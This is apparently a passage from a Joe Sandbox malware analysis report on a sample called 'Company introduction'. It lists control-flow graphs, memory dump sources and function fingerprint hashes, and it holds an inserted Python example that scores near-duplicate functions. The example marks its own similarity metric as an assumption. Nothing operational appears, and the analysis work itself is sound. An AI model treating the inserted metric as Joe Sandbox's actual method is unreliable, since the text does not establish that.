115 17d7a51-17d7a55 108->115 110->72 110->74 111->43 112->111 118 17d7aca-17d7ad4 call 17d63e0 113->118 119 17d7b04-17d7b08 113->119 120 17d7a5f-17d7a68 114->120 121 17d7a92-17d7a94 114->121 115->43 115->114 122 17d79ee-17d79f0 116->122 117->122 118->119 133 17d7ad6-17d7aeb 118->133 119->76 125 17d7b0e-17d7b12 119->125 128 17d7a6a-17d7a6f 120->128 129 17d7a77-17d7a8d 120->129 121->43 123 17d7a9a-17d7aa1 121->123 122->43 122->98 125->76 130 17d7b18-17d7b25 125->130 128->129 129->43 135 17d7b34 130->135 136 17d7b27-17d7b32 130->136 133->119 141 17d7aed-17d7b02 133->141 138 17d7b36-17d7b38 135->138 136->138 138->43 138->76 141->2 141->119 144->84 145->84
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                                                                                                    • API String ID: 0-1932283790
                                                                                                                                                    • Opcode ID: 7339e004a5d9811a42389c1869d6f76adebb22040c4309f10e37e7e5c17d7588
                                                                                                                                                    • Instruction ID: 7f7cc3da098a527b57715d636066ff3db0e01b6aec7a3729ed346d750d7bb7f9
                                                                                                                                                    • Opcode Fuzzy Hash: 7339e004a5d9811a42389c1869d6f76adebb22040c4309f10e37e7e5c17d7588
                                                                                                                                                    • Instruction Fuzzy Hash: 8D124930A002498FCB19CF68D984AAEFBF2FF89318F1585A9E5599B361D730ED45CB50

                                                                                                                                                    Control-flow Graph
                                                                                                                                                    control_flow_graph 1679 17d8490-17d897e 1754 17d8984-17d8994 1679->1754 1755 17d8ed0-17d8f05 1679->1755 1754->1755 1756 17d899a-17d89aa 1754->1756 1760 17d8f07-17d8f0c 1755->1760 1761 17d8f11-17d8f2f 1755->1761 1756->1755 1758 17d89b0-17d89c0 1756->1758 1758->1755 1759 17d89c6-17d89d6 1758->1759 1759->1755 1762 17d89dc-17d89ec 1759->1762 1763 17d8ff6-17d8ffb 1760->1763 1772 17d8fa6-17d8fb2 1761->1772 1773 17d8f31-17d8f3b 1761->1773 1762->1755 1764 17d89f2-17d8a02 1762->1764 1764->1755 1766 17d8a08-17d8a18 1764->1766 1766->1755 1768 17d8a1e-17d8a2e 1766->1768 1768->1755 1769 17d8a34-17d8a44 1768->1769 1769->1755 1771 17d8a4a-17d8a5a 1769->1771 1771->1755 1774 17d8a60-17d8ecf 1771->1774 1779 17d8fc9-17d8fd5 1772->1779 1780 17d8fb4-17d8fc0 1772->1780 1773->1772 1778 17d8f3d-17d8f49 1773->1778 1787 17d8f6e-17d8f71 1778->1787 1788 17d8f4b-17d8f56 1778->1788 1785 17d8fec-17d8fee 1779->1785 1786 17d8fd7-17d8fe3 1779->1786 1780->1779 1790 17d8fc2-17d8fc7 1780->1790 1785->1763 1786->1785 1799 17d8fe5-17d8fea 1786->1799 1791 17d8f88-17d8f94 1787->1791 1792 17d8f73-17d8f7f 1787->1792 1788->1787 1801 17d8f58-17d8f62 1788->1801 1790->1763 1794 17d8ffc-17d901e 1791->1794 1795 17d8f96-17d8f9d 1791->1795 1792->1791 1803 17d8f81-17d8f86 1792->1803 1805 17d902e 1794->1805 1806 17d9020 1794->1806 1795->1794 1800 17d8f9f-17d8fa4 1795->1800 1799->1763 1800->1763 1801->1787 1811 17d8f64-17d8f69 1801->1811 1803->1763 1810 17d9030-17d9031 1805->1810 1806->1805 1809 17d9027-17d902c 1806->1809 1809->1810 1811->1763
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: $^q$$^q
                                                                                                                                                    • API String ID: 0-355816377
                                                                                                                                                    • Opcode ID: f833e799b9468276ea8b4dc0f1d6fc7b74ba773b0152c4e9d1f73f3463e446c1
                                                                                                                                                    • Instruction ID: a1d15fa3694deeb9ba202b6bfb0ec008cfbceb3383fe8048c7869559928d872f
                                                                                                                                                    • Opcode Fuzzy Hash: f833e799b9468276ea8b4dc0f1d6fc7b74ba773b0152c4e9d1f73f3463e446c1
                                                                                                                                                    • Instruction Fuzzy Hash: 40520E74A0021DCFEB149BA4C860BAEBB77FB94300F1481A9D11A6B3A5CF359D85DF52

                                                                                                                                                    Control-flow Graph
                                                                                                                                                    control_flow_graph 2138 17d5f38-17d5f5a 2139 17d5f5c-17d5f60 2138->2139 2140 17d5f70-17d5f7b 2138->2140 2141 17d5f88-17d5f8f 2139->2141 2142 17d5f62-17d5f6e 2139->2142 2143 17d5f81-17d5f83 2140->2143 2144 17d6023-17d604f 2140->2144 2146 17d5faf-17d5fb8 2141->2146 2147 17d5f91-17d5f98 2141->2147 2142->2140 2142->2141 2145 17d601b-17d6020 2143->2145 2151 17d6056-17d60ae 2144->2151 2245 17d5fba call 17d5f38 2146->2245 2246 17d5fba call 17d5f2a 2146->2246 2147->2146 2148 17d5f9a-17d5fa5 2147->2148 2150 17d5fab-17d5fad 2148->2150 2148->2151 2150->2145 2170 17d60bd-17d60cf 2151->2170 2171 17d60b0-17d60b6 2151->2171 2152 17d5fc0-17d5fc2 2153 17d5fca-17d5fd2 2152->2153 2154 17d5fc4-17d5fc8 2152->2154 2158 17d5fd4-17d5fd9 2153->2158 2159 17d5fe1-17d5fe3 2153->2159 2154->2153 2157 17d5fe5-17d6004 call 17d69a0 2154->2157 2163 17d6019 2157->2163 2164 17d6006-17d600f 2157->2164 2158->2159 2159->2145 2163->2145 2239 17d6011 call 17dafad 2164->2239 2240 17d6011 call 17daeba 2164->2240 2241 17d6011 call 17daef0 2164->2241 2167 17d6017 2167->2145 2173 17d60d5-17d60d9 2170->2173 2174 17d6163-17d6165 2170->2174 2171->2170 2175 17d60e9-17d60f6 2173->2175 2176 17d60db-17d60e7 2173->2176 2242 17d6167 call 17d6300 2174->2242 2243 17d6167 call 17d62f0 2174->2243 2184 17d60f8-17d6102 2175->2184 2176->2184 2177 17d616d-17d6173 2178 17d617f-17d6186 2177->2178 2179 17d6175-17d617b 2177->2179 2182 17d617d 2179->2182 2183 17d61e1-17d6240 2179->2183 2182->2178 2197 17d6247-17d626b 2183->2197 2187 17d612f-17d6133 2184->2187 2188 17d6104-17d6113 2184->2188 2189 17d613f-17d6143 2187->2189 2190 17d6135-17d613b 2187->2190 2199 17d6115-17d611c 2188->2199 2200 17d6123-17d612d 2188->2200 2189->2178 2194 17d6145-17d6149 2189->2194 2192 17d613d 2190->2192 2193 17d6189-17d61da 2190->2193 2192->2178 2193->2183 2196 17d614f-17d6161 2194->2196 2194->2197 2196->2178 2207 17d626d-17d626f 2197->2207 2208 17d6271-17d6273 2197->2208 2199->2200 2200->2187 2209 17d62e9-17d62ec 2207->2209 2210 17d6275-17d6279 2208->2210 2211 17d6284-17d6286 2208->2211 2215 17d627f-17d6282 2210->2215 2216 17d627b-17d627d 2210->2216 2217 17d6299-17d629f 2211->2217 2218 17d6288-17d628c 2211->2218 2215->2209 2216->2209 2219 17d62ca-17d62cc 2217->2219 2220 17d62a1-17d62c8 2217->2220 2221 17d628e-17d6290 2218->2221 2222 17d6292-17d6297 2218->2222 2227 17d62d3-17d62d5 2219->2227 2220->2227 2221->2209 2222->2209 2229 17d62db-17d62dd 2227->2229 2230 17d62d7-17d62d9 2227->2230 2231 17d62df-17d62e4 2229->2231 2232 17d62e6 2229->2232 2230->2209 2231->2209 2232->2209 2239->2167 2240->2167 2241->2167 2242->2177 2243->2177 2245->2152 2246->2152
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Hbq$Hbq
                                                                                                                                                    • API String ID: 0-4258043069
                                                                                                                                                    • Opcode ID: 7f3f25ecdab8f1999d6da9bb7ac328577aa6f4b08709a877950233a3e1a9ee8a
                                                                                                                                                    • Instruction ID: 46b0cb078ba0d1c5cf2f0ae7e3d762f38c3e8a55a34334b10e93f91e24e63bf7
                                                                                                                                                    • Opcode Fuzzy Hash: 7f3f25ecdab8f1999d6da9bb7ac328577aa6f4b08709a877950233a3e1a9ee8a
                                                                                                                                                    • Instruction Fuzzy Hash: 85B1AE30704219CFDB169F38C854B6ABBB6AF89344F1489A9E946CB392DB35DC42C791

                                                                                                                                                    Control-flow Graph
                                                                                                                                                    Control-flow graph rendered interactively on the original page (legend: Executed / Not Executed); the block-level node and edge list is omitted here. Function at 17d6498, basic blocks spanning 17d6498-17d6736; no call edges appear in the graph.
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ,bq$,bq
                                                                                                                                                    • API String ID: 0-2699258169
                                                                                                                                                    • Opcode ID: f773f787c23e41fcf95cbeecb3839eab8823d8c85c9691b6f31c6259e854b41c
                                                                                                                                                    • Instruction ID: a2cce88d9b5aad67c3e5badf356614e8434ff8a5b7a8ab9b960bd80fc07fb8b1
                                                                                                                                                    • Opcode Fuzzy Hash: f773f787c23e41fcf95cbeecb3839eab8823d8c85c9691b6f31c6259e854b41c
                                                                                                                                                    • Instruction Fuzzy Hash: 5E81AF70A00509CFCB14CF6DC48896AFFB2FF89310B2585A9E506EB365DB31E841CB61
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (o^q$(o^q
                                                                                                                                                    • API String ID: 0-1946778100
                                                                                                                                                    • Opcode ID: 64295229dc8851a0a680e449a7afe714803e735c0fe8340932d0a65740d754b2
                                                                                                                                                    • Instruction ID: 448ffffec9e778dca193760e2fbd1239ea8e262893bec6ad5ece2e796abcbc01
                                                                                                                                                    • Opcode Fuzzy Hash: 64295229dc8851a0a680e449a7afe714803e735c0fe8340932d0a65740d754b2
                                                                                                                                                    • Instruction Fuzzy Hash: F441D731B042488FC70A9B79D854AADBFF2BFC9250F1944A9D516DB391DE31DC06CB90
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4'^q$4'^q
                                                                                                                                                    • API String ID: 0-2697143702
                                                                                                                                                    • Opcode ID: 7a2dfbcf8117504961e695137c8a94702c98578cdcce5c13d939cb1766563a25
                                                                                                                                                    • Instruction ID: 387bb7c8dab76b30daa46e65e47891ac9bb33eecf75b4b2c8432336fb1c66599
                                                                                                                                                    • Opcode Fuzzy Hash: 7a2dfbcf8117504961e695137c8a94702c98578cdcce5c13d939cb1766563a25
                                                                                                                                                    • Instruction Fuzzy Hash: 55F0443534011D6FDB081AAA98549BAFAEBEBCC3A4B144429BA0AC7354DE61CC5283A1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: LR^q
                                                                                                                                                    • API String ID: 0-2625958711
                                                                                                                                                    • Opcode ID: a126f03359b55b3f32dd90ae9032666607e845f70e07121d6a0fee35295ae00e
                                                                                                                                                    • Instruction ID: 82d1c3c2565301619931c55d2ccd38023a1db40921529e4c2cd6a9d3cfeabfbd
                                                                                                                                                    • Opcode Fuzzy Hash: a126f03359b55b3f32dd90ae9032666607e845f70e07121d6a0fee35295ae00e
                                                                                                                                                    • Instruction Fuzzy Hash: 5A520674E00219CFCB54DF68E994A8DBBB2FB49301F1085B9D809A7364DB786E95CF90
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: LR^q
                                                                                                                                                    • API String ID: 0-2625958711
                                                                                                                                                    • Opcode ID: b31e0b742eeca5e373c403415368f0b13739517a83c030fe8de026d2dc8e65e3
                                                                                                                                                    • Instruction ID: a54cd164f953aa93a342e40e3fa94d0b4c42d7e56f8155446958b7f78fd2f9c3
                                                                                                                                                    • Opcode Fuzzy Hash: b31e0b742eeca5e373c403415368f0b13739517a83c030fe8de026d2dc8e65e3
                                                                                                                                                    • Instruction Fuzzy Hash: A8520674E00619CFCB54DF68E994A8DBBB2FB48301F1085B9D809A7364DB386E95CF90
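The two entries above that share the String ID LR^q have Instruction Fuzzy Hashes that differ in only five hex positions, which is the kind of near-duplicate the report's Similarity fields are meant to surface (the Opcode ID, by contrast, only matches when the code is identical). The following is an added example, not Joe Sandbox code: it parses a constructed compact copy of four records from this page (the hash values are the page's own, the one-line record layout is mine), groups them by String ID and scores pairs with a positional match ratio over the hex fuzzy hash. That ratio, and the function names parse_records, hash_similarity, group_by_string_id and near_duplicates, are assumptions; Joe Sandbox's actual similarity metric is not documented on this page and may differ.

```python
"""Score near-duplicate functions from a sandbox report's per-function fingerprints.

Added example, not Joe Sandbox code. The record layout and the similarity
metric (positional match ratio over the hex fuzzy hash) are assumptions;
the hash values themselves are copied from the report's Similarity entries.
"""
import re
from itertools import combinations

# Constructed input: four records copied from this report's "Similarity"
# entries, rewritten one function per line (this layout is assumed, not Joe Sandbox's).
RECORDS = """\
string_id=LR^q opcode=a126f033 ifh=5A520674E00219CFCB54DF68E994A8DBBB2FB49301F1085B9D809A7364DB786E95CF90
string_id=LR^q opcode=b31e0b74 ifh=A8520674E00619CFCB54DF68E994A8DBBB2FB48301F1085B9D809A7364DB386E95CF90
string_id=Hbq$Hbq opcode=7f3f25ec ifh=85B1AE30704219CFDB169F38C854B6ABBB6AF89344F1489A9E946CB392DB35DC42C791
string_id=,bq$,bq opcode=f773f787 ifh=5E81AF70A00509CFCB14CF6DC48896AFFB2FF89310B2585A9E506EB365DB31E841CB61
"""

_RECORD_RE = re.compile(r"string_id=(\S+) opcode=([0-9a-f]+) ifh=([0-9A-F]+)")


def parse_records(text):
    """Return one dict per record with keys string_id, opcode (Opcode ID prefix), ifh."""
    out = []
    for line in text.splitlines():
        m = _RECORD_RE.match(line.strip())
        if m:
            out.append({"string_id": m.group(1), "opcode": m.group(2), "ifh": m.group(3)})
    return out


def hash_similarity(a, b):
    """Fraction of positions at which two hex fuzzy hashes agree (0.0 to 1.0).

    Assumption: a plain positional comparison. Unmatched trailing positions
    of the longer hash count as mismatches.
    """
    n = max(len(a), len(b))
    if n == 0:
        return 1.0
    matches = sum(1 for x, y in zip(a, b) if x == y)
    return matches / n


def group_by_string_id(records):
    """Map each String ID to the Opcode IDs of the functions that reference it."""
    groups = {}
    for r in records:
        groups.setdefault(r["string_id"], []).append(r["opcode"])
    return groups


def near_duplicates(records, threshold=0.9):
    """Pairs of Opcode IDs whose fuzzy hashes agree at >= threshold, best first."""
    pairs = []
    for r1, r2 in combinations(records, 2):
        if r1["opcode"] == r2["opcode"]:
            continue  # same Opcode ID means identical code, not a near duplicate
        score = hash_similarity(r1["ifh"], r2["ifh"])
        if score >= threshold:
            pairs.append((r1["opcode"], r2["opcode"], score))
    return sorted(pairs, key=lambda p: -p[2])


if __name__ == "__main__":
    recs = parse_records(RECORDS)
    for sid, ops in group_by_string_id(recs).items():
        print(f"String ID {sid!r}: {len(ops)} function(s) {ops}")
    for a, b, s in near_duplicates(recs):
        print(f"near-duplicate: {a} ~ {b} (similarity {s:.3f})")
```

On this input the only pair above the 0.9 threshold is a126f033 / b31e0b74, the two LR^q functions, at 65 of 70 positions; the Hbq and ,bq functions score far lower against everything else. A shared String ID is therefore a useful pivot but not proof of similar code on its own; the fuzzy hash comparison is what confirms it.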
                                                                                                                                                    APIs
                                                                                                                                                    • LdrInitializeThunk.NTDLL(00000000), ref: 05A89A6E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2955296568.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_5a80000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: e92f356e6e3d4197e83b9f89b153b84ab80ae5e3da1a0e704c6e42ff1258b7d8
                                                                                                                                                    • Instruction ID: 53ea5ee1b28cfcc0f6bb33252d788bd54848c87708b0eaeddbaa9f33f93bbc44
                                                                                                                                                    • Opcode Fuzzy Hash: e92f356e6e3d4197e83b9f89b153b84ab80ae5e3da1a0e704c6e42ff1258b7d8
                                                                                                                                                    • Instruction Fuzzy Hash: 75113A74E051099FDB04EFA9E884EBEFBB5FB88304F1481A5E914E7245DB70A942CB10
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4f780be1b544d7f0787740ac34800762bc75c5537eba3e77f5692b158c9490c3
                                                                                                                                                    • Instruction ID: af5f277e18696e4dd0519da79977a1fb745394946b7ba7525006d171224084cd
                                                                                                                                                    • Opcode Fuzzy Hash: 4f780be1b544d7f0787740ac34800762bc75c5537eba3e77f5692b158c9490c3
                                                                                                                                                    • Instruction Fuzzy Hash: 5412AB348A134A8FE3586B20E6BC56AFA61FF1F3A3786AD14E91FC1445DB7104688F61
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8c69d8e5965570b685bf1d2344a10775730abe7eb09a38f818d76724969d7ddf
                                                                                                                                                    • Instruction ID: b342759cc2826134fd177288f688239956f05950f768ce2c825561e8851e9eef
                                                                                                                                                    • Opcode Fuzzy Hash: 8c69d8e5965570b685bf1d2344a10775730abe7eb09a38f818d76724969d7ddf
                                                                                                                                                    • Instruction Fuzzy Hash: E8129C348A134B8FE2586F20E6BC56AFA61FF1F3A3786AD14E91FC1445DB7104688F61
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 7a535b095ec533b8ae348fd4f2887dd715b9a1da0f672257601a6b7adef7fab4
                                                                                                                                                    • Instruction ID: e1da6c2ef56d69a55ccb81e743451cd43b171b3a2c948b612045f308571ff40c
                                                                                                                                                    • Opcode Fuzzy Hash: 7a535b095ec533b8ae348fd4f2887dd715b9a1da0f672257601a6b7adef7fab4
                                                                                                                                                    • Instruction Fuzzy Hash: EE716B347046098FDB15DF6DC898B6EBBF5AF49240B1900A9E901DB371DB71EC41CB92
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8932262c9071047dcda985104951fecff68d95ec9526251ed44182a59682e3cf
                                                                                                                                                    • Instruction ID: 53f7d0c942ad4f6a1898b6fc62ca1803d48006b8b9b0f02f228d423a013dc909
                                                                                                                                                    • Opcode Fuzzy Hash: 8932262c9071047dcda985104951fecff68d95ec9526251ed44182a59682e3cf
                                                                                                                                                    • Instruction Fuzzy Hash: 5321AE32A0020C9FCB148F68C895AEDFBB6FF8C350F5944A5E906A7391DA719C11CBA0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: dc4b1ebf5407d6dd779e8c9296b9762cd3d2be4813322b00c0420d4c1401bb75
                                                                                                                                                    • Instruction ID: f528a92c6abac12c099df1d58e41d5bae775fc0bd0dde1122c9078faa59528da
                                                                                                                                                    • Opcode Fuzzy Hash: dc4b1ebf5407d6dd779e8c9296b9762cd3d2be4813322b00c0420d4c1401bb75
                                                                                                                                                    • Instruction Fuzzy Hash: FC216630E0124DDFDB09CFA9D550AEEBFB6AF48219F288069E515F6290DB39D941DB20
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4f5854622e0bfcd1791fb5992d774d76371c9bceabf8a4fcd6e1f7cf55dd13f8
                                                                                                                                                    • Instruction ID: 003a5aee78710d8364792971e6903e2039ba4df6829d33109cc2c08458768fe5
                                                                                                                                                    • Opcode Fuzzy Hash: 4f5854622e0bfcd1791fb5992d774d76371c9bceabf8a4fcd6e1f7cf55dd13f8
                                                                                                                                                    • Instruction Fuzzy Hash: 7111E335B055159FD7194A2AD46852EFBB2BFC579530944A9E906CB3A0CF20DC028B90
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a9f9f44602f10a48c2a0b5200760d7cba08055a650d04528f01ab7c0afe09a67
                                                                                                                                                    • Instruction ID: a6311c398601953f3c4abff389323e22eca6684c34690eaacb9b91bfdb7ff5e9
                                                                                                                                                    • Opcode Fuzzy Hash: a9f9f44602f10a48c2a0b5200760d7cba08055a650d04528f01ab7c0afe09a67
                                                                                                                                                    • Instruction Fuzzy Hash: 2A210FB4C4520E8FCB41EFA8D8545EEBBF0AF0A210F5041AAD805B6210EB301A95CBA2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2938537757.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_117d000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                    • Instruction ID: 83b4a3329b90dd47bf52f08f7d51ff15f1a886280e80d9abe8418b41041e5482
                                                                                                                                                    • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                    • Instruction Fuzzy Hash: 2811DF76504284CFCF06CF54E5C4B16BF72FB84314F24C5A9E8090B256C336D45ACBA2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b2e9f2f1144d963ed3b595649445587687c8ebfe770fc460737f131f903d84c4
                                                                                                                                                    • Instruction ID: e26a1dcfcb2781cbf509719af94cb38af7f81eaca8f5d7d89ed2b68ee9eb7f85
                                                                                                                                                    • Opcode Fuzzy Hash: b2e9f2f1144d963ed3b595649445587687c8ebfe770fc460737f131f903d84c4
                                                                                                                                                    • Instruction Fuzzy Hash: 42113D70D0010A9FDB08EFA8D580A9EBFF2FB44304F10D5B9C018A7364EB345A458B81
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2938633009.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_118d000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                    • Instruction ID: ecd681262eb7b7e5a1f26dd8948f0da6ad2876c30d38d8b0ca03c170e35c1a58
                                                                                                                                                    • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                    • Instruction Fuzzy Hash: BC11A9755042848FDB16DF64D9C4B16BBA2FB84314F24C6AAD8494B292C33AD44ACF62
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 0757e3fef1078be4b9d1ecf052705b5338a8ac5bfb1c6c85b5af945e685d0e0c
                                                                                                                                                    • Instruction ID: 1c1cd797a5baa6d230cb889b71f98377f2e0bd2d874c05a78aa355c0619ef24c
                                                                                                                                                    • Opcode Fuzzy Hash: 0757e3fef1078be4b9d1ecf052705b5338a8ac5bfb1c6c85b5af945e685d0e0c
                                                                                                                                                    • Instruction Fuzzy Hash: F0012832B0425DAFCB069E59D8206EF7FB6DFDD290B08805AFA04CB384DA318D129791
                                                                                                                                                    Memory Dump Source
